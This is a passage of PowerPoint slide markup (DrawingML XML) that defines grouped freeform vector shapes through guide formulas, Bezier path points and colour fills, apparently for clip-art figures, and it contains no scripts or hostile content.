              <a:solidFill>
                <a:srgbClr val="FFED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55" name="Freeform 2946"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1282" y="-2679"/>
                <a:ext cx="206" cy="57"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 87 w 87"/>
                  <a:gd name="T1" fmla="*/ 2 h 24"/>
                  <a:gd name="T2" fmla="*/ 61 w 87"/>
                  <a:gd name="T3" fmla="*/ 15 h 24"/>
                  <a:gd name="T4" fmla="*/ 34 w 87"/>
                  <a:gd name="T5" fmla="*/ 9 h 24"/>
                  <a:gd name="T6" fmla="*/ 0 w 87"/>
                  <a:gd name="T7" fmla="*/ 0 h 24"/>
                  <a:gd name="T8" fmla="*/ 0 w 87"/>
                  <a:gd name="T9" fmla="*/ 9 h 24"/>
                  <a:gd name="T10" fmla="*/ 34 w 87"/>
                  <a:gd name="T11" fmla="*/ 18 h 24"/>
                  <a:gd name="T12" fmla="*/ 61 w 87"/>
                  <a:gd name="T13" fmla="*/ 24 h 24"/>
                  <a:gd name="T14" fmla="*/ 87 w 87"/>
                  <a:gd name="T15" fmla="*/ 12 h 24"/>
                  <a:gd name="T16" fmla="*/ 87 w 87"/>
                  <a:gd name="T1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24">
                    <a:moveTo>
                      <a:pt x="87" y="2"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="5"/>
                      <a:pt x="70" y="15"/>
                      <a:pt x="61" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="15"/>
                      <a:pt x="34" y="9"/>
                      <a:pt x="34" y="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8"/>
                      <a:pt x="58" y="24"/>
                      <a:pt x="61" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="24"/>
                      <a:pt x="82" y="16"/>
                      <a:pt x="87" y="12"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="87" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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956" name="Group 2959"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5157439" y="3300504"/>
              <a:ext cx="212725" cy="523875"/>
              <a:chOff x="3734" y="3117"/>
              <a:chExt cx="471" cy="1168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="957" name="Freeform 2960"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3706"/>
                <a:ext cx="212" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 21 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 11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6 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 21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1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="25" y="13"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="18"/>
                      <a:pt x="3" y="32"/>
                      <a:pt x="3" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="49"/>
                      <a:pt x="0" y="182"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="44" y="225"/>
                      <a:pt x="44" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="207"/>
                      <a:pt x="44" y="211"/>
                      <a:pt x="44" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="245"/>
                      <a:pt x="87" y="236"/>
                      <a:pt x="89" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="48"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="17"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="21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58" name="Freeform 2961"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3853" y="3706"/>
                <a:ext cx="212" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 21 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 11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6 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 21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1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="25" y="13"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="18"/>
                      <a:pt x="3" y="32"/>
                      <a:pt x="3" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="49"/>
                      <a:pt x="0" y="182"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="44" y="225"/>
                      <a:pt x="44" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="207"/>
                      <a:pt x="44" y="211"/>
                      <a:pt x="44" y="211"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="245"/>
                      <a:pt x="87" y="236"/>
                      <a:pt x="89" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="48"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="17"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="2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59" name="Freeform 2962"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3734" y="3318"/>
                <a:ext cx="471" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 193 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232">
                    <a:moveTo>
                      <a:pt x="193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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="33" y="4"/>
                      <a:pt x="30" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="4" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="181"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="62" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="110"/>
                      <a:pt x="148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60" name="Freeform 2963"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3734" y="3318"/>
                <a:ext cx="471" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 193 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 193 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232">
                    <a:moveTo>
                      <a:pt x="193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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="33" y="4"/>
                      <a:pt x="30" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="17"/>
                      <a:pt x="8" y="139"/>
                      <a:pt x="4" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="181"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="62" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="142" y="110"/>
                      <a:pt x="148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61" name="Freeform 2964"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3938" y="3800"/>
                <a:ext cx="23" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 11 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="15"/>
                      <a:pt x="9" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="7"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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62" name="Freeform 2965"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3888" y="3292"/>
                <a:ext cx="154" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 65"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 65"/>
                  <a:gd name="T3" fmla="*/ 19 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 65"/>
                  <a:gd name="T5" fmla="*/ 12 h 41"/>
                  <a:gd name="T6" fmla="*/ 52 w 65"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 56 w 65"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 29 w 65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" h="41">
                    <a:moveTo>
                      <a:pt x="29" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="16"/>
                      <a:pt x="12" y="15"/>
                      <a:pt x="15" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="10"/>
                      <a:pt x="52" y="0"/>
                      <a:pt x="52" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="21"/>
                      <a:pt x="46" y="25"/>
                      <a:pt x="56" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="33"/>
                      <a:pt x="45" y="41"/>
                      <a:pt x="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63" name="Freeform 2966"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3867" y="3165"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 0 w 80"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 39 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="64"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38" y="1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64" name="Freeform 2967"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3867" y="3165"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 0 w 80"/>
                  <a:gd name="T3" fmla="*/ 42 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 39 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="0" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="64"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38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65" name="Freeform 2968"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3876" y="3276"/>
                <a:ext cx="92" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 39"/>
                  <a:gd name="T1" fmla="*/ 13 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 6 h 32"/>
                  <a:gd name="T4" fmla="*/ 21 w 39"/>
                  <a:gd name="T5" fmla="*/ 28 h 32"/>
                  <a:gd name="T6" fmla="*/ 36 w 39"/>
                  <a:gd name="T7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32">
                    <a:moveTo>
                      <a:pt x="36" y="13"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="13"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="11" y="24"/>
                      <a:pt x="21" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="32"/>
                      <a:pt x="39" y="32"/>
                      <a:pt x="36" y="13"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="9AC1D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66" name="Freeform 2969"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3961" y="3254"/>
                <a:ext cx="97" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 97 w 97"/>
                  <a:gd name="T1" fmla="*/ 0 h 52"/>
                  <a:gd name="T2" fmla="*/ 0 w 97"/>
                  <a:gd name="T3" fmla="*/ 52 h 52"/>
                  <a:gd name="T4" fmla="*/ 97 w 97"/>
                  <a:gd name="T5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7" h="52">
                    <a:moveTo>
                      <a:pt x="97" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="52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67" name="Line 2970"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="3961" y="3254"/>
                <a:ext cx="97" cy="5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68" name="Freeform 2971"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3860" y="3228"/>
                <a:ext cx="196" cy="78"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 83 w 83"/>
                  <a:gd name="T1" fmla="*/ 11 h 33"/>
                  <a:gd name="T2" fmla="*/ 52 w 83"/>
                  <a:gd name="T3" fmla="*/ 14 h 33"/>
                  <a:gd name="T4" fmla="*/ 0 w 83"/>
                  <a:gd name="T5" fmla="*/ 0 h 33"/>
                  <a:gd name="T6" fmla="*/ 0 w 83"/>
                  <a:gd name="T7" fmla="*/ 20 h 33"/>
                  <a:gd name="T8" fmla="*/ 19 w 83"/>
                  <a:gd name="T9" fmla="*/ 25 h 33"/>
                  <a:gd name="T10" fmla="*/ 27 w 83"/>
                  <a:gd name="T11" fmla="*/ 23 h 33"/>
                  <a:gd name="T12" fmla="*/ 33 w 83"/>
                  <a:gd name="T13" fmla="*/ 28 h 33"/>
                  <a:gd name="T14" fmla="*/ 52 w 83"/>
                  <a:gd name="T15" fmla="*/ 33 h 33"/>
                  <a:gd name="T16" fmla="*/ 52 w 83"/>
                  <a:gd name="T17" fmla="*/ 14 h 33"/>
                  <a:gd name="T18" fmla="*/ 83 w 83"/>
                  <a:gd name="T19" fmla="*/ 1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3" h="33">
                    <a:moveTo>
                      <a:pt x="83" y="11"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="14"/>
                      <a:pt x="52" y="14"/>
                      <a:pt x="52" y="1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24" y="22"/>
                      <a:pt x="27" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="23"/>
                      <a:pt x="33" y="28"/>
                      <a:pt x="33" y="28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14"/>
                      <a:pt x="52" y="14"/>
                      <a:pt x="52" y="14"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="83" y="11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69" name="Freeform 2972"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3850" y="3117"/>
                <a:ext cx="230" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 94 w 97"/>
                  <a:gd name="T1" fmla="*/ 56 h 93"/>
                  <a:gd name="T2" fmla="*/ 77 w 97"/>
